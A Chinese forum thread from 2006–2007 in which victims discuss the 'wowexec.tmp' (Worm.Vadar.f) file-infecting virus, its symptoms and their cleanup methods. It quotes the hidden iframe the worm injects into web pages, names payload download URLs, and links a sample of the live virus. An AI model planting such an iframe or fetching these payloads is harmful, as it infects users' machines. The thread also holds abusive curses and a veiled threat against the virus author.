- UID
- 12472
注册时间2006-5-7
阅读权限20
最后登录1970-1-1
以武会友
 
TA的每日心情 | 开心
2016-6-17 14:50 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
令人吐血的最新强劲病毒“wowexec.tmp”
(注意是wowexec.tmp,不是wowexec.exe或wowexec)
这是本人见过的最厉害的最闹心的病毒。
好像从16号开始感觉中毒的,17号出现诸多异常问题,18号用了大半天的时间折腾,依然没有搞定,病毒还在肆虐,我无奈无辙。。。
17号发现的一些异常情况:某些安装文件打不开;进程里有不明的程序;以“打开-浏览”方式寻找文件可以看到部分应用程序图标变异。
昨天中午开始对系统进行处理,以我经常用的 格式化-ghost 方式来消灭病毒。我C盘是98
D盘是2000,ghost后,进2000系统安装一些常用程序。在安装了winrar之后,硬盘灯开始一直闪,我马上打开任务管理器,看到CPU使用率满了,进程里很明显的多出来一个“wowexec.tmp”,我郁闷的看着硬盘红灯一直闪,机器一定在运行着什么。我刷新系统D盘,看到大小不时的变化,最后发现“Documents
and Settings\用户\Local
Settings\Temp\”里有大量的文件产生,大都是无后缀的,其中几个.exe文件,当然也有“wowexec.tmp”。
过一会后一切恢复“正常”。我又装了其他程序(我程序都装在F盘),在打开原有的qq时,告诉不能使用,只好重装一下,才能用。
昨天多次搜索wowexec.tmp,百度结果是0;google结果只有3项;百度贴吧里有一个帖子。所有的帖子结果都是17号发的。
现在再搜索,百度已经出来10多个结果了,google也多了几个页面。
经过多次重整系统,病毒依然没办法消除。现在,
每次开机后一段时间,内存占用不大,CPU占用很大,硬盘灯一直闪。若干分钟后,恢复正常。
系统盘每开机一次就会变大不少。在Documents and Settings\用户\Local
Settings\Temp\下生出大量垃圾文件。(98系统是windows\temp)
系统会变慢不少。
部分应用文件无法使用。
看了一些相关帖子,说卡巴6.0更新下病毒库就可以杀了,但杀了后那些感染病毒的.exe文件都报废了,也没说是否可以彻底解决病毒。
摆脱不了这个病毒,现在真是痛苦啊!!
作者:天蓝云白 回复日期:2006-12-19 0930
这个病毒我上传到金山了,有需要研究的可以试试
http://bbs.kingsoft.com/attachment.php?fid=3254&aid=16009223
病毒文件原名:“wowexec.tmp”
下载的文件是“wowexec[1].tmp.rar”,改过来名字就行。
要慎重操作啊,这个病毒太厉害了。
作者:天蓝云白 回复日期:2006-12-19 0914
用记事本打开病毒wowexec.tmp。
前边后边一堆乱码,中间居然显示出来以下汉字:
“对于一些调试器,如SoftIce,Filemon,Regmon,
您必须重新启动计算机使其不驻留才能运行此
程序,对于一些破解工具如IceExt,您必须彻底
的删除它才能运行此程序”
作者:iicedream 回复日期:2006-12-19 1128
我也是受害者,这个病毒差不多把我一半的可执行文件都破坏了
作者:天蓝云白 回复日期:2006-12-19 1516
我把硬盘全格了,目前暂时摆脱了病毒的困扰。
这个垃圾病毒这几天把我折磨坏了。
作者:fosky 回复日期:2006-12-19 1609
看来不止我一个受害者! 刚刚和它都斗争整晚,几乎所有的
exe文件都被感染了,一旦打开被感染的exe文件就会自动在系统根目录\DOCUME~1\administrator\LOCALS~1\Temp\下生成wowexec.tmp
和MediaSups.exe这两个文件,如果是windows2k
XP以上的系统还会生成wowexec.tmp的进程,此进程会不断消耗系统内存,直到系统完全瘫痪或蓝屏。
当我试图用filemon来监测wowexec.tmp进程的调用时惊奇的发现进程居然识别出来并自动终结自己。用记事本打开wowexec.tmp文件可以看到如下信息:
错误
发现调试器-请将其关闭并重新启动程序
对于一些调试器,如SoftIce,Filemon,Regmon,
您必须重新启动计算机使其不驻留才能运行此
程序,对于一些破解工具如IceExt,您必须彻底
的删除它才能运行此程序
基本上可以认定这个病毒的是国人所为还用反破解的一些手段。
(在此我想问候制造这个病毒的那个人的全家女性一千万次,你TMD全家都不得好死!!! )
病毒在tmp目录下生成wowexec.tmp 和MediaSups.exe文件后还会继续生成一些乱七八糟的.exe 和.tmp 文件这时候防火墙开始报警:
已检测到: 木马程序 Backdoor.Win32.Small.mw URL: http://www.dosboy.com/dos.exe
病毒用它生成的木马程序调用了IE在后台访问http://www.dosboy.com/下载dos.exe文件.
http://www.dosboy.com 是一个不存在的网站了解析下域名发现其ip地址为203.171.239.4
您查询的IP:203.171.239.4
查询结果1:河南省郑州市 景安网络
查询结果2:河南省郑州市 景安计算机网络技术有限公司
作者: 天使也PK 2007-1-7 00:43 回复此发言
--------------------------------------------------------------------------------
2 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
有时候病毒也会访问http://add.rr121.com来下载其他的文件
解析其ip为220.162.247.180
您查询的IP:220.162.247.180
查询结果1:福建省三明市 电信
查询结果2:福建省三明市 电信
现在正告其他受害者,中毒以后千万别在运行其他程序或访问其他的分区,以免病毒继续扩散,立刻升级杀毒软件病毒库并在安全模式下查杀病毒,一定要反复扫描几次以免漏网。被感染的exe文件要坚决清除莫再运行!
作者:大血满弓刀 回复日期:2006-12-19 2013
我们大伙都去**妈批,NND搞个病毒后缀还是tmp(他妈批)
作者:游出大海的鱼 回复日期:2006-12-19 2124
我晕啊,周日到今天我都装了N次系统就是这个病毒害的,而且没有办法消除
作者:无效的ID 回复日期:2006-12-19 2212
我前几天也中了这个毒。
我的解决方法是:
首先停止“wowexec.exe”进程
同时删除在“C:\Documents and Settings\Administrator\Local Settings\Temp\”文件夹里的所有文件。
查看被感染的exe文件,看看修改的日期,然后全盘搜索相应日期的exe文件并删除,一般能解决
实在不行,在上一步骤后,重装系统,就不会有这个病毒了。
但是那些exe文件要重新安装,麻烦。
——————————
我的分析:
这个病毒也是下载到temp文件夹并运行的,我查看了相关的文件,这几个比较有嫌疑:wowexec.tmp tsepuehu.dll svsktv.exe
其中tsepuehu.dll这个文件在我被感染时我的木马防火墙一直提醒我:
“实时监控发现木马病毒或广告间谍程序[2006-12-16|下午 1115]
C:\Documents and Settings\Administrator\Local Settings\Temp\tsepuehu.dll ”
防火墙一直试图删除这个文件,但没有成功。
同时还提醒我系统目录下有新文件建立:
“windows目录有新文件建立[2006-12-16|下午 1153]
C:\WINDOWS\system32\xuhuan.ini”
““windows目录有新文件建立[2006-12-16|下午 1153]
C:\WINDOWS\system32\xuhuan.tmp”
这2个文件同样一直建立,不能删除。但后来(应该是重启后)查看时,发现该文件s已经删除。
我查看了一下tsepuehu.dll ,里面有这个网址:“http://www.dosboy.com/dos.exe”
可能跟这个有关。我下载了该dos.exe,发现这个文件与前面所提到的那个“svsktv.exe”文件完全一样。
在temp文件夹中于这几个wowexec.tmp tsepuehu.dll
文件件同一时刻建立了好多无后缀名文件如“cDXQMdsY”“WJvZump”等,绝大多数文件的大小为812k,同时内容一致。
作者:丝家珍藏 回复日期:2006-12-20 917
恩,我也是17号有这个问题的,
诺顿隔离了。
弹出两次窗口后来好像自己好了。
作者:筱子i 回复日期:2006-12-20 11:07:49
学习一下
作者: 天使也PK 2007-1-7 00:44 回复此发言
--------------------------------------------------------------------------------
4 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
================
作者:aixinxiaoniao 回复日期:2006-12-22 2032
真是很有痛感,我是牺牲了所有 硬盘资料 才坐这和大家探讨的
病毒太厉害,正版的瑞星都杀不出来
该死的
wowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmpwowexec.tmp
作者:红哥 回复日期:2006-12-22 2042
靠 什么鸟病毒
搞了几天都没搞定
作者:血轮眼 回复日期:2006-12-22 2251
用下ewdio 好多卡巴搞不定的这个也能搞定,
作者:eagle_1972 回复日期:2006-12-23 0007
中招,太厉害了。ghost也不行。
所有e盘exe文件图标变成箭头,一运行就启动wowexec.tmp进程,在document and setting里不停建立新文件
我的机器瘫调了
作者:lonno 回复日期:2006-12-23 02:03:09
1 中毒
2 第一次ghost重装
3 重装后执行了硬盘里的.exe后又中毒 汗!
4 第二次ghost重装,点错了,点成了 disk from image,结果一个80G硬盘里的东东全没了,用 recovery也没恢复过来。 晕4了!
5 第三次重装番茄花园手动装,装了Mcafee , 但没设置规则,没装防火墙
6 用了2天后,21号晚开始一上QQ或MSN就会死机,winlogon.exe (用户名为system)占用了绝大部分CPU资源 痛苦!
7 第四次重装原版手动装,装好之后先制作了一个image
8 装常用程序,重复6 额滴神啊!
9 第五次用刚做好的ghost重装,装Mcafee,设置了自定义规则,最高防护, 想想还不放心,又装了kaspersky 6 ,装完之后重启,系统不动了~
彻底晕了!
10 第六次重装,装Mcafee, 想想Mcafee 防是防得好, 杀还是要Kapersky, 于是卸载, 装Kapasky 6 病毒库更新到当前。
11 手动删见到的 .exe 文件
12 安全模式下扫描 我的电脑 查出2种共70多个木马(是 Trojan-DDoS.Win32.Agent.p 和
not-a-virus:AdWare.Win32.Plin.b) 整个世界清静了
13 制作了一个装好常用程序的,杀毒软件是Kapersky的 image 偶快累死了~
14 打算下周再重装一次,装Mcafee, 规则定严点(各位有好规则的还给咱推荐则个!^_^)
后记:此毒关键是会全盘传染、 中毒后先找相关信息很重要、 中毒之后尽快全面杀毒。 偶有快2年没上过防毒治毒的实践课了, 这次收获也不少, 哈哈~
作者:日金山 回复日期:2006-12-24 10:56:03
金山的那个什么科多专杀有个逼用.一个程序就一个广告而已.我用了n都没见病毒被杀掉, f***金山~
作者:ermao927 回复日期:2006-12-24 1225
谁说那个科多兽专杀能杀的 垃圾 就是一个金山的托儿 我昨天杀了四五遍 要不要我截个它们和睦相处的图看看 强烈鄙视~~~
作者:妹妹日着洋娃娃 回复日期:2006-12-25 0939
昨晚忙着做个ASP的系统,只挂了个QQ,突然发现系统缓慢,就win+d了下,好家伙居然有防火墙的连接提示。马上打开任务管理器,异常进程wowexe.tmp
作者: 天使也PK 2007-1-7 00:45 回复此发言
--------------------------------------------------------------------------------
5 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
结束掉后,重启电脑~(安装的有冰点还原,C盘数据受保护,重启后数据恢复原状!)
但是启动后居然还有!!!
想起来自启动的有迅雷,可是界面却没出来,进程也没有出现。怀疑病毒感染了它,于是结束进程,
重装迅雷,将临时文件清空。
打开迅雷,一切恢复正常!
正喜着呢…………嘿嘿
准备开QQ来着,却又没反应!大意咯啊,看来问题没这么简单啊…………
很多EXE文件(除了被保护的C盘内的),变得在详细查看方式下没有图标而是个快捷方式箭头!
到网上查了下,乖乖,居然是刚刚出来两周的新病毒。病毒疯狂地制造垃圾文件并吃内存,挤网络,进程不停地向一家网络安全公司联络(难道就是他们制造的病毒么?)
因为病毒太新,在GOOGLE上只有数条相关内容!
病毒被我误打误撞居然弄没了,但是无数的程序损坏。并且病毒依旧潜伏在这些被感染的EXE文件中!
太狠了!!!
目前没有专杀工具,部分杀毒软件可以发现该病毒,但是没有一个可以清除!
我在考虑如何把电脑里无数的软件重装~~惨啊,比上次中威金病毒都惨!
郁闷了~!有文件被病毒损坏!
幸好俺动作够快啊~~
在D盘搜了下,在2006年12月21日, 2330到2006年12月21日, 2320
这不到一分钟时间内,D盘EXE文件大部分被感染!!
————————————————————这是发生在昨晚的~~
中午来写代码,又发现了问题:
只要进程出现,它就对硬盘里的EXE文件进行感染,刚才一不小心打开了个图片,由于关联的浏览器也被感染了,所以再次启动了病毒的进程。马上杀掉,搜索全盘,发现F盘的CS和病毒专杀工具被干掉了!真TMD强啊!!!
————————————————————在DW里按F12预览网页,发现状态栏提示错误,还有连接提示(……)
再次发现新症状!!
病毒还感染htm\html\asp网页文件,在代码最后添加
<iframe src=http://wm.168080.com/wm/wm.htm width=0 height=0></iframe>
这样只要连网,就会再次染毒!!!
该病毒是epower的变种!看来要清除真的很难啊!!!
作者:法哥的fans007 回复日期:2006-12-27 19:56:17
谁能告诉我wowexec这个病毒作者的地址,别问我要干什么!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
作者: 天使也PK 2007-1-7 00:45 回复此发言
--------------------------------------------------------------------------------
6 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
作者:powboy001 回复日期:2006-12-28 1136
GHOST也没用的,我已经低格了,可怜啊
作者:siamgo 回复日期:2006-12-29 0:01:23
我好伤心,,,我电脑中所有的文件全部没有了..
而且我现在还弄不定这个病毒...
气愤啊,,,,,,
我所有的心血,,,
什么来恢复............
作者:jlbszty 回复日期:2006-12-29 2050
我的更惨 谁来帮帮我啊 我的这个病毒会关闭任务管理器 杀毒软件打开就自动关闭 有关”多科兽”的网页打开就死机 我要疯了
谁来救救我 还原精灵也不好使!!!!
作者:cyy0530 回复日期:2006-12-30 124
紧急请教:我的QQ打不开与好友聊天的对话框了,重新装QQ,重新装系统都没办法。怎么办?在线等高手指教!
作者:老袋 回复日期:2006-12-30 149
作者:qdxues 回复日期:2006-12-29 0103
如果杀不掉的话这样,
打开任务管理把wowexec.tmp结束掉,进入C:\Documents and Settings\Administrator\Local
Settings\TEMP\把wowexec.tmp删除,然后右健-新建-文本文档,新建了一个记事本什么都不要写,点文件-另存为,在保存类型选择(所有文件)文件名为(wowexec.tmp)然后点保存,把建好的wowexec.tmp属性修改为只读(把存档去掉)就可以了,这样只能确保病毒不能运行,但无法删除病毒
------------------------
偶近来也只能用这法子.近出的这些个会感染EXE的混蛋实在是不好清,东藏一个西藏一个,只好先破坏它们的联系再说.
期待专杀工具中.....
--------------------------------------------------------------------------------------------------------------------------------------------------------------
在看瑞星的介绍!!!
据瑞星全球反病毒监测网介绍,今日有一个病毒特别值得注意,它是:“瓦达变种F(Worm.Vadar.f)”病毒。该病毒会感染Windows可执行文件,可造成用户文件损坏、企业网络瘫痪。
本日热门病毒:
“瓦达变种F(Worm.Vadar.f)”病毒:警惕程度★★★☆,蠕虫病毒,通过局域网共享、感染文件等方式传播,依赖系统:WIN 9X/NT/2000/XP。
这是“瓦达”病毒的最新变种。该病毒运行后会将自身复制到系统的临时文件夹下,文件名为“wowexec.tmp”、“MediaSups.exe”以及一个文件名为随机8位大小写字母,文件大小为470,528字节的文件。“瓦达”病毒还会试图感染用户计算机上的EXE可执行文件,由于病毒编写存在一些问题,会造成某些文件损坏。
因为编写问题,此病毒的专杀工具,有待时日
并且作者还是继续写着
作者: 天使也PK 2007-1-7 00:46 回复此发言
--------------------------------------------------------------------------------
7 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
此病毒,绝对是2006年底,最厉害的病毒
并且将荣登2007年第一个
杀害无数电脑的超强NB病毒
再次声明截止现在,没有发现可用的可以完全修复的专杀工具,希望大家不要乱用!!!最好对重要资料做备份!
作者: 天使也PK 2007-1-7 00:48 回复此发言
--------------------------------------------------------------------------------
8 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
安阳市区内24小时上门维修电脑(9:00--18:00免费上门其他时间加收5元)
维修后该维修项目一周内出现非人为故障,重新维修,不在收取任何费用。
(北关区,南关,铁西,东区,安钢,开发区,以及洹北附近,纱厂。其他地区需支付往返车费)
重装系统仅需10元
其他问题价格面议
联系电话:13703725449
在线QQ :3145453
作者: 天使也PK 2007-1-7 00:49 回复此发言
--------------------------------------------------------------------------------
9 回复7:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年
怎样把它搞定加我QQ380515806
作者: 220.172.115.* 2007-1-11 18:07 回复此发言
--------------------------------------------------------------------------------
10 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
问题已解决:先下江民2007(我是在烟桥社区下载的)杀掉所有盘的EXE文件,将EXE中的病毒删了,再下个“文本替换专家”将所有HTM,HTML,ASP等等中的<iframe src=http://wm.168080.com/wm/wm.htm width=0 height=0></iframe>替换成空格,经测试一切正常~
哈哈,科多兽终于死在我手上了~
作者: mozine 2007-1-13 16:40 回复此发言
--------------------------------------------------------------------------------
11 回复:提示:严重关切中“wowexec.tmp”(Worm.Vadar.f)!2006年底
恩,是滴,俺也被爱了,唉,好不容易才搞定
友情提示:中此毒的兄弟千万别侥幸硬盘里EXE文件能逃脱,唯一办法重新安装.
我已向瑞星和毒霸提供样本,一起敬候佳音吧.:L :L :L |
评分
-
查看全部评分
|
IP卡
发表于 2007-1-26 17:44:52
提升卡
置顶卡
变色卡
千斤顶
显身卡
发表于 2007-2-21 04:43:06
发表于 2007-2-27 23:34:07